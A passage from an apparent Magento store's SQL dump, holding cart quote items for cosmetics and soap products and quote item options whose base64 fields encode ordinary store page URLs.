(469, 1239, '2026-05-03 14:20:16', '2026-05-03 14:20:16', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(470, 1241, '2026-05-03 21:53:10', '2026-05-03 21:53:10', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(471, 1243, '2026-05-04 05:21:25', '2026-05-04 05:21:25', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(472, 1245, '2026-05-04 12:59:40', '2026-05-04 12:59:40', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(473, 1247, '2026-05-04 20:43:21', '2026-05-04 20:43:21', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(474, 1250, '2026-05-05 04:06:53', '2026-05-05 04:06:53', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(475, 1252, '2026-05-05 11:49:25', '2026-05-05 11:49:25', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(476, 1255, '2026-05-05 17:51:09', '2026-05-05 17:51:09', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 422.0000, 422.0000, NULL, 20.0000, 84.4000, 84.4000, 0.0000, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 422.0000, 422.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(477, 1257, '2026-05-05 17:51:17', '2026-05-05 17:51:17', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(478, 1259, '2026-05-05 17:51:47', '2026-05-05 17:51:47', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(479, 1261, '2026-05-05 19:38:27', '2026-05-05 19:38:27', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(480, 1263, '2026-05-06 03:15:30', '2026-05-06 03:15:30', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(481, 1265, '2026-05-06 11:00:35', '2026-05-06 11:00:35', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(482, 1267, '2026-05-06 18:45:49', '2026-05-06 18:45:49', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(483, 1269, '2026-05-07 02:29:25', '2026-05-07 02:29:25', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(484, 1271, '2026-05-07 10:10:52', '2026-05-07 10:10:52', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(485, 1274, '2026-05-07 18:04:44', '2026-05-07 18:04:44', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(486, 1277, '2026-05-08 07:59:16', '2026-05-08 07:59:16', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(487, 1280, '2026-05-08 23:47:56', '2026-05-08 23:47:56', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(488, 1281, '2026-05-09 02:48:27', '2026-05-09 02:48:27', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 422.0000, 422.0000, NULL, 20.0000, 84.4000, 84.4000, 0.0000, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 422.0000, 422.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(489, 1284, '2026-05-09 15:36:36', '2026-05-09 15:36:36', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(490, 1287, '2026-05-10 07:43:10', '2026-05-10 07:43:10', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(491, 1288, '2026-05-10 09:26:15', '2026-05-10 09:26:15', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 422.0000, 422.0000, NULL, 20.0000, 84.4000, 84.4000, 0.0000, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 422.0000, 422.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(492, 1291, '2026-05-10 09:26:54', '2026-05-10 09:26:54', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(493, 1292, '2026-05-10 09:26:58', '2026-05-10 09:26:58', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(494, 1297, '2026-05-10 23:44:14', '2026-05-10 23:44:14', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(495, 1300, '2026-05-11 15:38:35', '2026-05-11 15:38:35', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(496, 1303, '2026-05-12 07:26:25', '2026-05-12 07:26:25', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `quote_item_option`
--

CREATE TABLE `quote_item_option` (
  `option_id` int(10) UNSIGNED NOT NULL COMMENT 'Option ID',
  `item_id` int(10) UNSIGNED NOT NULL COMMENT 'Item ID',
  `product_id` int(10) UNSIGNED NOT NULL COMMENT 'Product ID',
  `code` varchar(255) NOT NULL COMMENT 'Code',
  `value` text DEFAULT NULL COMMENT 'Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Flat Quote Item Option';

--
-- Dumping data for table `quote_item_option`
--

INSERT INTO `quote_item_option` (`option_id`, `item_id`, `product_id`, `code`, `value`) VALUES
(13, 5, 2063, 'info_buyRequest', '{\"uenc\":\"aHR0cDovLzE5Mi4xNjguMTAuMjUwL2Jpc21veS8,\",\"product\":\"2063\",\"qty\":1}'),
(17, 9, 2062, 'info_buyRequest', '{\"uenc\":\"aHR0cDovLzExOC4xNzkuNDMuMjAvYmlzbW95L2Nvc21ldGljcy5odG1s\",\"product\":\"2062\",\"qty\":1}'),
(18, 10, 2060, 'info_buyRequest', '{\"uenc\":\"aHR0cDovLzExOC4xNzkuNDMuMjAvYmlzbW95Lw,,\",\"product\":\"2060\",\"qty\":1}'),
(19, 11, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovLzExOC4xNzkuNDMuMjAvYmlzbW95Lw,,\",\"product\":\"2061\",\"qty\":1}'),
(20, 12, 2062, 'info_buyRequest', '{\"uenc\":\"aHR0cDovLzExOC4xNzkuNDMuMjAvYmlzbW95Lw,,\",\"product\":\"2062\",\"qty\":1}'),
(21, 13, 2060, 'info_buyRequest', '{\"uenc\":\"aHR0cDovLzExOC4xNzkuNDMuMjAvYmlzbW95Lw,,\",\"product\":\"2060\",\"qty\":1}'),
(22, 14, 2055, 'info_buyRequest', '{\"uenc\":\"aHR0cDovLzExOC4xNzkuNDMuMjAvYmlzbW95Lw,,\",\"product\":\"2055\",\"qty\":1}'),
(23, 15, 2063, 'info_buyRequest', '{\"uenc\":\"aHR0cDovLzExOC4xNzkuNDMuMjAvYmlzbW95L3JhbXktbWVzdGEtZ3VhcmQtZmFjZS5odG1s\",\"product\":\"2063\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2063\",\"qty\":\"1\"}'),
(24, 16, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tL2NyZWFtLmh0bWw,\",\"product\":\"2064\",\"qty\":1}'),
(26, 18, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2061\",\"qty\":1}'),
(27, 19, 2063, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1tZXN0YS1ndWFyZC1mYWNlLmh0bWw,\",\"product\":\"2063\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2063\",\"qty\":\"1\"}'),
(28, 20, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tL2NyZWFtLmh0bWw,\",\"product\":\"2064\",\"qty\":1}'),
(29, 21, 2063, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2063\",\"qty\":1}'),
(30, 22, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vbmV3LXNwb3QuaHRtbA,,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"qty\":\"1\"}'),
(31, 23, 2063, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2063\",\"qty\":1}'),
(32, 24, 2058, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2058\",\"qty\":1}'),
(33, 25, 2063, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tLw,,\",\"product\":\"2063\",\"qty\":1}'),
(34, 26, 2063, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tLw,,\",\"product\":\"2063\",\"qty\":1}'),
(35, 27, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1zcG90LWNsZWFuZXItY3JlYW0uaHRtbA,,\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2061\",\"qty\":\"1\"}'),
(36, 28, 2062, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1tZXN0YS1ndWFyZC5odG1s\",\"product\":\"2062\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2062\",\"qty\":\"1\"}'),
(37, 29, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vbmV3LXNwb3QuaHRtbA,,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"qty\":\"4\"}'),
(38, 30, 2063, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1tZXN0YS1ndWFyZC1mYWNlLmh0bWw,\",\"product\":\"2063\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2063\",\"qty\":\"3\"}'),
(39, 31, 2062, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1tZXN0YS1ndWFyZC5odG1s\",\"product\":\"2062\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2062\",\"qty\":\"2\"}'),
(40, 32, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vbmV3LXNwb3QuaHRtbA,,\",\"product\":\"2064\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2064\",\"qty\":\"1\"}'),
(41, 33, 2063, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1tZXN0YS1ndWFyZC1mYWNlLmh0bWw,\",\"product\":\"2063\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2063\",\"qty\":\"1\"}'),
(42, 34, 2064, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2064\",\"qty\":1}'),
(43, 35, 2063, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1tZXN0YS1ndWFyZC1mYWNlLmh0bWw,\",\"product\":\"2063\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2063\",\"qty\":1}'),
(44, 36, 2062, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1tZXN0YS1ndWFyZC5odG1s\",\"product\":\"2062\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2062\",\"qty\":\"1\"}'),
(45, 37, 2062, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1tZXN0YS1ndWFyZC5odG1s\",\"product\":\"2062\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2062\",\"qty\":\"1\"}'),
(46, 38, 2058, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2058\",\"qty\":1}'),
(47, 39, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20v\",\"product\":\"2061\",\"qty\":1}'),
(48, 40, 2058, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vY2F0YWxvZ3NlYXJjaC9yZXN1bHQvaW5kZXgvP3Byb2R1Y3RfbGlzdF9saW1pdD0zNiZxPWNyZWFtJnNlYXJjaF9jYXQ9\",\"product\":\"2058\",\"qty\":1}'),
(49, 41, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vY2F0YWxvZy9wcm9kdWN0L3ZpZXcvaWQvMjA2MS8,\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2061\",\"qty\":1}'),
(50, 42, 2062, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1tZXN0YS1ndWFyZC5odG1s\",\"product\":\"2062\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2062\",\"qty\":\"1\"}'),
(51, 43, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vY2F0YWxvZy9wcm9kdWN0L3ZpZXcvaWQvMjA2MS8,\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2061\",\"qty\":1}'),
(52, 44, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vY2F0YWxvZy9wcm9kdWN0L3ZpZXcvaWQvMjA2MS8,\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2061\",\"qty\":1}'),
(53, 45, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vY2F0YWxvZy9wcm9kdWN0L3ZpZXcvaWQvMjA2MS8,\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2061\",\"qty\":1}'),
(54, 46, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tL2dyb2NlcnkuaHRtbA,,\",\"product\":\"2061\",\"qty\":1}'),
(55, 47, 2063, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1tZXN0YS1ndWFyZC1mYWNlLmh0bWw,\",\"product\":\"2063\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2063\",\"qty\":\"1\"}'),
(56, 48, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1zcG90LWNsZWFuZXItY3JlYW0uaHRtbA,,\",\"product\":\"2061\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"qty\":\"1\",\"item\":\"2061\"}'),
(57, 49, 2062, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1tZXN0YS1ndWFyZC5odG1s\",\"product\":\"2062\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2062\",\"qty\":\"1\"}'),
(58, 50, 2062, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1tZXN0YS1ndWFyZC5odG1s\",\"product\":\"2062\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2062\",\"qty\":\"1\"}'),
(59, 51, 2062, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1tZXN0YS1ndWFyZC5odG1s\",\"product\":\"2062\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2062\",\"qty\":\"1\"}'),
(60, 52, 2062, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1tZXN0YS1ndWFyZC5odG1s\",\"product\":\"2062\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2062\",\"qty\":\"1\"}'),
(61, 53, 2062, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1tZXN0YS1ndWFyZC5odG1s\",\"product\":\"2062\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2062\",\"qty\":\"1\"}'),
(62, 54, 2062, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1tZXN0YS1ndWFyZC5odG1s\",\"product\":\"2062\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2062\",\"qty\":\"1\"}'),
(63, 55, 2062, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1tZXN0YS1ndWFyZC5odG1s\",\"product\":\"2062\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2062\",\"qty\":\"1\"}'),
(64, 56, 2062, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1tZXN0YS1ndWFyZC5odG1s\",\"product\":\"2062\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2062\",\"qty\":\"1\"}'),
(65, 57, 2062, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1tZXN0YS1ndWFyZC5odG1s\",\"product\":\"2062\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2062\",\"qty\":\"1\"}'),
(66, 58, 2062, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1tZXN0YS1ndWFyZC5odG1s\",\"product\":\"2062\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2062\",\"qty\":\"1\"}'),
(67, 59, 2062, 'info_buyRequest', '{\"uenc\":\"aHR0cDovL2Jpc21veS5jb20vcmFteS1tZXN0YS1ndWFyZC5odG1s\",\"product\":\"2062\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2062\",\"qty\":\"1\"}'),
(68, 60, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tLw,,\",\"product\":\"2061\",\"qty\":1}'),
(69, 61, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tLw,,\",\"product\":\"2061\",\"qty\":1}'),
(70, 62, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tLw,,\",\"product\":\"2061\",\"qty\":1}'),
